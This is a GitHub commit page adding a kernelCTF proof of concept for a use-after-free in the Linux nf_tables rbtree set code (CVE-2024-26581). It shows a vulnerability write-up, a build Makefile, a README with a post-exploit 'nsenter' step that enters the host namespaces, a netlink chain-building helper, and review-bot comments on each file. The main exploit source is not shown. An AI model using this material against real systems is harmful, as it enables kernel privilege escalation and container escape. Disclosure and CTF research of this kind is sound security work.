Add kernelCTF CVE-2024-26581_lts_cos_mitigation (#109)
* Add CVE-2024-1085_lts
* Change metadata.json
* Change exploit.c
* Change exploit.c
* Change exploit.c
* Change exploit.c
* Fix bug
* Fix bug
* Add more details
* Add CVE-2024-26581_lts_cos_mitigation
* Fix metadata.json
* Fix exploit
* Fix exploit
* Fix exploit
* Add more details in exploit.md
* Add more details in exploit.md
* Add more details in exploit.md
* Fix cos exploit.c
* Fix cos exploit.c
* Fix cos exploit.c
* Delete pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/exploit/exploit
* add more details in exploit.md
* for stability test
* for stability test
* for stability test
* for stability test
* for stability test
* for stability test
* for stability test

---------

Co-authored-by: lonial con <[email protected]>
1 parent 699139f, commit 7f0fd3f
Showing 30 changed files with 4,357 additions and 0 deletions.
pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/docs/exploit.md (292 changes: 292 additions & 0 deletions; large diff not rendered)
pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/docs/vulnerability.md (48 changes: 48 additions & 0 deletions)
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,48 @@ | ||
# Vulneribility | ||
In function `nft_rbtree_gc_elem`, it lacks a check similar to this [commit](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/net/netfilter/nft_set_rbtree.c?id=2ee52ae94baabf7ee09cf2a8d854b990dac5d0e4) for the setelement pointed to by `prev`. | ||
This is the existing check for looking for prev: | ||
```c | ||
while (prev) { | ||
rbe_prev = rb_entry(prev, struct nft_rbtree_elem, node); | ||
if (nft_rbtree_interval_end(rbe_prev) && | ||
nft_set_elem_active(&rbe_prev->ext, genmask)) | ||
break; | ||
prev = rb_prev(prev); | ||
} | ||
``` | ||
and this is how it should be checked: | ||
```c | ||
u8 cur_genmask = nft_genmask_cur(net); | ||
while (prev) { | ||
rbe_prev = rb_entry(prev, struct nft_rbtree_elem, node); | ||
if (nft_rbtree_interval_end(rbe_prev) && | ||
nft_set_elem_active( &rbe_prev->ext, genmask) && | ||
nft_set_elem_active(&rbe_prev->ext, cur_genmask)) | ||
break; | ||
prev = rb_prev(prev); | ||
} | ||
``` | ||
The lack of this check may result in use-after-free of the set element pointed to by prev. | ||
|
||
## Requirements to trigger the vulnerability | ||
- Capabilities: `CAP_NET_ADMIN` capability is required. | ||
- Kernel configuration: `CONFIG_NETFILTER`, `CONFIG_NF_TABLES` | ||
- Are user namespaces needed?: Yes | ||
|
||
## Commit which introduced the vulnerability | ||
- [commit c9e6978e2725a7d4b6cd23b2facd3f11422c0643](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/nft_set_rbtree.c?id=c9e6978e2725a7d4b6cd23b2facd3f11422c0643) | ||
|
||
## Commit which fixed the vulnerability | ||
- [commit 60c0c230c6f046da536d3df8b39a20b9a9fd6af0](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter?id=60c0c230c6f046da536d3df8b39a20b9a9fd6af0) | ||
|
||
## Affected kernel versions | ||
- 6.1.9 and later | ||
- 5.15.91 and later | ||
- 5.10.166 and later | ||
|
||
## Affected component, subsystem | ||
- net/netfilter (nf_tables) | ||
|
||
## Cause | ||
- UAF | ||
|
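Review bot: the write-up stops short of saying why the existing `genmask` test is not enough, which is the whole point of the added `cur_genmask` check: the `genmask` used during the walk is the next-generation mask, so an end-interval element added earlier in the same, not yet committed, transaction is active under it but not yet under `nft_genmask_cur(net)`, and the lazy gc in `nft_rbtree_gc_elem` frees it while the transaction still references it. One sentence to that effect before "The lack of this check may result in use-after-free" would make the root cause clear to a reader who does not already know the genmask scheme. Minor: the heading should read `# Vulnerability`, and the second snippet has a stray space in `nft_set_elem_active( &rbe_prev->ext, genmask)`.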
pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/exploit/cos-105-17412.226.68/Makefile (9 changes: 9 additions & 0 deletions)
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,9 @@ | ||
exploit: | ||
gcc -o exploit exploit.c -I/usr/include/libnl3 -lnl-nf-3 -lnl-route-3 -lnl-3 -static | ||
prerequisites: | ||
sudo apt-get install libnl-nf-3-dev | ||
run: | ||
./exploit | ||
|
||
clean: | ||
rm exploit |
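Review bot: the `exploit` target declares no prerequisites, so `make` only builds when the binary is missing and silently keeps a stale `exploit` after `exploit.c` or `chain.h` changes; declare `exploit: exploit.c chain.h` and mark `prerequisites`, `run` and `clean` as `.PHONY` so they are not mistaken for files. In `clean`, `rm -f exploit` avoids a failing target when the binary is already gone.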
pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/exploit/cos-105-17412.226.68/README (2 changes: 2 additions & 0 deletions)
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
Exploit for kctf cos-105-17412.226.68 | ||
Run command "nsenter --target 1 -m -p" after run the poc. |
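Review bot: grammar: "after run the poc" should read "after running the PoC". Since this README is the only run instruction shipped with the binary, it should also state what the reader is expected to observe after `nsenter --target 1 -m -p` on success and how a failed run shows itself, so the stability-test results mentioned in the commit message can be reproduced.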
pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/exploit/cos-105-17412.226.68/chain.h (24 changes: 24 additions & 0 deletions)
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,24 @@ | ||
extern int cur_handle; | ||
struct nlmsghdr * new_chain_msg(char *table_name, char *chain_name, int if_binding){ | ||
struct nl_msg * msg2 = nlmsg_alloc(); | ||
struct nlmsghdr *hdr2 = nlmsg_put( | ||
msg2, | ||
NL_AUTO_PORT, // auto assign current pid | ||
NL_AUTO_SEQ, // begin wit seq number 0 | ||
(NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWCHAIN),// TYPE | ||
sizeof(struct nfgenmsg), | ||
NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO | ||
); | ||
struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); | ||
h2->nfgen_family = 2;//NFPROTO_IPV4; | ||
h2->version = 0; | ||
h2->res_id = NFNL_SUBSYS_NFTABLES; | ||
memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); | ||
nla_put_string(msg2, NFTA_CHAIN_TABLE, table_name); | ||
nla_put_string(msg2, NFTA_CHAIN_NAME, chain_name); | ||
if(if_binding>0){ | ||
nla_put_u32(msg2, NFTA_CHAIN_FLAGS, htonl(NFT_CHAIN_BINDING)); | ||
} | ||
cur_handle++; | ||
return hdr2; | ||
} |
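Review bot: `new_chain_msg` leaks on every call: the `struct nl_msg *msg2` from `nlmsg_alloc()` is neither returned nor freed, so the caller holding only `hdr2` can never `nlmsg_free()` it, and `h2` is `malloc`'d just to be copied into the message and dropped. Build the `struct nfgenmsg` on the stack (or fill `nlmsg_data(hdr2)` directly) and either return the `struct nl_msg *` or take it as a parameter. The return values of `nla_put_string` and `nla_put_u32` are unchecked, so a failed attribute put goes unnoticed. Also, `cur_handle++` is a hidden side effect that does not appear in the message; a non-`static` function definition in a header produces duplicate symbols if `chain.h` is ever included from two translation units; `h2->nfgen_family = 2` should use `NFPROTO_IPV4`, which the trailing comment already names; and the comment "begin wit seq number 0" should read "begin with".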
pocs/linux/kernelctf/CVE-2024-26581_lts_cos_mitigation/exploit/cos-105-17412.226.68/exploit (binary file added, +1.24 MB, not shown)